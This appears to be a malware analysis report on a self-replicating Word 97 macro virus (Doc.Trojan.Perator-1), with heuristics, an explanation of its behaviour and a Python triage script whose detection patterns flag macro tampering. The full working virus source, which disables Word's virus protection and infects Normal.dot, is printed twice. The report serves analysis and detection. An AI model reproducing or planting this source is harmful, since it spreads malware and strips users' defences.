Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 60795749b72824eb…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 36.0 KB
Created: 1999-07-06 22:55:00
Authoring application: Microsoft Word 8.0 (Word 97)
First seen: 2012-06-14
MD5: ef7ca5e57ea4589644e8ea2ff1ec3d6c
SHA-1: 63294ca8d2fa2b208f45159528c302e7219e007f
SHA-256: 60795749b72824ebc6b8a446021dabe148991b0ee6dd9515128a4a153bce674b
Risk score: 122

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample's VBA project has a ThisDocument module with a Document_Open procedure, so the code runs as soon as the document is opened with macros enabled (T1059.005). What it does is not a download lure but a self-replicating Word 97 macro virus:

  • Metadata tag. Dialogs(wdDialogFileSummaryInfo) is given Title 'bHAK 31337 oPERATOR/rUNE wAS hERE', Author 'oPERATOR' and Keywords 'http://lz0vx.cjb.net', then .Execute applies those values to the document's summary properties without showing the dialog. The URL is the author's calling card in the metadata; nothing in the macro contacts it or any other host, and nothing is written to disk other than the infected documents.
  • Defense tampering. SetAttr NormalTemplate.FullName, vbNormal clears the read-only bit on Normal.dot, and Options.SaveNormalPrompt and Options.VirusProtection are set to (Rnd * 0), which is always 0 (False) but keeps the literal False out of the source. This suppresses the prompt to save the changed template and Word's built-in macro virus warning; On Error Resume Next hides any failure.
  • Replication. Through the VBProject / VBComponents / CodeModule object model the macro reads the full source of the module it runs from (MacroContainer) and chooses a target: Normal.dot when running from a document, the active document when already running from Normal.dot. If line 52 of the target module does not end with the 27-character marker 'bHAK 31337 - oPERATOR/rUNE (the comment that closes the virus, pushed to line 52 by the blank-line padding), the target module is emptied, the virus source is written in, and the active document is saved. With the save prompt disabled, a modified Normal.dot is written back silently when Word exits and infects documents opened from then on.
  • Payload. When Day(Now()) equals 2 * Int(Rnd * 15), that is on even days 2 to 28 with a 1-in-15 chance per open and never on other days, a message box 'bLEED°rAKAtAKA' titled 'BHAK 31337' appears and USER32!ShowCursor(False) is called in a loop until the display counter goes negative, hiding the mouse cursor.

The code is concealed in the VBA editor by 30 empty lines and deep indentation on every code line. The ClamAV name Doc.Trojan.Perator-1 matches the 'oPERATOR' handle in the code. The T1566.001 mapping reflects the usual delivery of such documents as an e-mail attachment; the static analysis itself shows no delivery path.
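Added example (not part of the scanner output or of the sample): a Python routine that applies the checks behind this report's heuristics to the decoded macro text, so the conclusions above can be reproduced on this and similar samples. It flags auto-exec entry points, Win32 Declare imports, embedded URLs, access to the VBProject/VBComponents/CodeModule object model together with the methods that write VBA source (the self-replication mechanism), the Options.* and SetAttr tampering, and the marker literal the infection check compares against. The indicator lists, the name triage_vba and the result keys are this example's own choices, not oletools API; the sample input is a dedented copy of the macro shown under Extracted artifacts.

```python
import re

# Dedented copy of the macro from this report's macros.bas, used here as the
# constructed sample input (the original hides it behind 30 empty lines and a
# long run of leading spaces on every code line).
SAMPLE_MACRO = r"""Private Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer
Private Sub Document_Open()
On Error Resume Next: Set egger = MacroContainer: tappler = 2
With Dialogs(wdDialogFileSummaryInfo): .Title = "bHAK 31337 oPERATOR/rUNE wAS hERE": .Author = "oPERATOR": .Keywords = "http://lz0vx.cjb.net": .Execute: End With
SetAttr NormalTemplate.FullName, vbNormal: Options.SaveNormalPrompt = (Rnd * 0)
Set walchensteiner = egger.VBProject: Options.VirusProtection = (Rnd * 0)
Set laggner = walchensteiner.vbcomponents((tappler - 1)): Set gaggl = laggner.codemodule
Set straubinger = NormalTemplate: bachler = gaggl.lines((tappler - 1), gaggl.countoflines)
If egger = straubinger Then Set straubinger = ActiveDocument
Set thalhammer = straubinger.VBProject.vbcomponents((tappler - 1)).codemodule
If Right(thalhammer.lines((tappler * 26), (tappler - 1)), 27) <> "'bHAK 31337 - oPERATOR/rUNE" Then
thalhammer.deletelines 1, thalhammer.countoflines
thalhammer.addfromstring bachler
If ActiveDocument.Saved = False Then ActiveDocument.SaveAs ActiveDocument.FullName
End If
If Day(Now()) = (tappler * (Int(Rnd * 15))) Then
MsgBox "bLEED°rAKAtAKA", 0, "BHAK 31337"
While ShowCursor(False) >= 0
Wend
End If
End Sub
'bHAK 31337 - oPERATOR/rUNE
"""

# Entry points Word and Excel run without user interaction.
AUTO_EXEC = re.compile(
    r"\b(?:Sub|Function)\s+"
    r"(Auto(?:Open|Close|Exec|New|Exit)|Document_(?:Open|Close|New)|Workbook_Open)\b",
    re.I,
)
# Win32 imports: Declare [PtrSafe] Function|Sub <name> Lib "<dll>"
API_DECLARE = re.compile(
    r'''\bDeclare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"''', re.I
)
URL = re.compile(r'''https?://[^\s"'<>]+''', re.I)
# The literal a macro virus compares the target module against before
# overwriting it: the string on the right-hand side of a "<>" test.
MARKER_CHECK = re.compile(r'''<>\s*"([^"]+)"''')

# Indicator lists are this example's own choice, not an oletools signature set.
SELF_REPL_OBJECTS = ("MacroContainer", "NormalTemplate", "VBProject", "VBComponents", "CodeModule")
CODE_MODULE_WRITES = ("AddFromString", "AddFromFile", "InsertLines", "DeleteLines", "ReplaceLine")
SECURITY_TAMPERING = ("Options.VirusProtection", "Options.SaveNormalPrompt",
                      "Application.AutomationSecurity", "SetAttr")


def _present(src, names):
    """Return the names from `names` that occur in `src`; VBA identifiers are case-insensitive."""
    return [n for n in names if re.search(r"\b" + re.escape(n) + r"\b", src, re.I)]


def triage_vba(src):
    """Apply the report's heuristic checks to decoded VBA source and return the findings."""
    auto_exec = sorted({m.group(1) for m in AUTO_EXEC.finditer(src)})
    api_imports = [(m.group(1), m.group(2)) for m in API_DECLARE.finditer(src)]
    urls = sorted(set(URL.findall(src)))
    objects = _present(src, SELF_REPL_OBJECTS)
    writes = _present(src, CODE_MODULE_WRITES)
    tampering = _present(src, SECURITY_TAMPERING)
    marker_match = MARKER_CHECK.search(src)
    marker = marker_match.group(1) if marker_match else None
    # Reading another module's code plus a method that writes VBA source is the
    # replication signature; a marker that is also a line of this very source
    # means the sample checks for its own presence before re-infecting.
    self_replicating = bool(objects) and bool(writes)
    marker_is_own_line = marker is not None and any(
        line.strip() == marker for line in src.splitlines()
    )
    return {
        "auto_exec": auto_exec,
        "api_imports": api_imports,
        "urls": urls,
        "object_model_access": objects,
        "code_module_writes": writes,
        "security_tampering": tampering,
        "self_replicating": self_replicating,
        "infection_marker": marker,
        "marker_is_own_line": marker_is_own_line,
    }


if __name__ == "__main__":
    for key, value in triage_vba(SAMPLE_MACRO).items():
        print(f"{key}: {value}")
```

Run as a script it prints the findings for the embedded sample; for other files pass the text olevba decodes to triage_vba. A hit on object_model_access alone is weak evidence (legitimate add-ins touch VBProject), which is why self_replicating also requires one of the write methods.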

Heuristics (4)

  • [critical] ClamAV: Doc.Trojan.Perator-1 (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Perator-1
  • [medium] VBA macros detected (OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • [high] Document_Open macro (OLE_VBA_DOCOPEN)
    Auto-executing Document_Open procedure present in the VBA project
  • [info] Embedded URL (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://lz0vx.cjb.net (in document text, OLE body; this is the string the macro assigns to the Keywords summary property)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3331 bytes
SHA-256: aa2858fd5ed8e92647ce213add9e968375ce44b99b0d56c0924cd006c9cb39f1

Script preview (first 1,000 lines of the extracted macro source):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' [report note] In the extracted source the module body opens with 30 empty lines and every
' code line is indented by several dozen spaces, so nothing is visible in the VBA editor
' without scrolling; the padding also puts the closing marker comment on module line 52,
' the line the infection check below reads. The whitespace is stripped here; the statements
' are reproduced unchanged.
' Win32 import used by the payload to hide the mouse cursor.
Private Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer
Private Sub Document_Open()
' egger = the document or template this code runs from; tappler = 2 supplies the constants
' below (tappler - 1 = first VBComponent, tappler * 26 = line 52, tappler * n = even day).
On Error Resume Next: Set egger = MacroContainer: tappler = 2
' Writes Title/Author/Keywords into the summary properties; .Execute applies them without showing the dialog.
With Dialogs(wdDialogFileSummaryInfo): .Title = "bHAK 31337 oPERATOR/rUNE wAS hERE": .Author = "oPERATOR": .Keywords = "http://lz0vx.cjb.net": .Execute: End With
' Make Normal.dot writable and silence the save-Normal prompt; (Rnd * 0) is 0 = False without the literal.
SetAttr NormalTemplate.FullName, vbNormal: Options.SaveNormalPrompt = (Rnd * 0)
' Disable Word's macro virus warning; take the code module of the first component (this module).
Set walchensteiner = egger.VBProject: Options.VirusProtection = (Rnd * 0)
Set laggner = walchensteiner.vbcomponents((tappler - 1)): Set gaggl = laggner.codemodule
' Copy the whole module source; target Normal.dot, or the active document if already running from Normal.dot.
Set straubinger = NormalTemplate: bachler = gaggl.lines((tappler - 1), gaggl.countoflines)
If egger = straubinger Then Set straubinger = ActiveDocument
Set thalhammer = straubinger.VBProject.vbcomponents((tappler - 1)).codemodule
' Infection check: if line 52 of the target does not end with the 27-character marker, replace its code.
If Right(thalhammer.lines((tappler * 26), (tappler - 1)), 27) <> "'bHAK 31337 - oPERATOR/rUNE" Then
thalhammer.deletelines 1, thalhammer.countoflines
thalhammer.addfromstring bachler
If ActiveDocument.Saved = False Then ActiveDocument.SaveAs ActiveDocument.FullName
End If
' Payload: on an even day of the month (2..28), with a 1-in-15 chance, show the message and hide the cursor.
If Day(Now()) = (tappler * (Int(Rnd * 15))) Then
MsgBox "bLEED°rAKAtAKA", 0, "BHAK 31337"
While ShowCursor(False) >= 0
Wend
End If
End Sub
'bHAK 31337 - oPERATOR/rUNE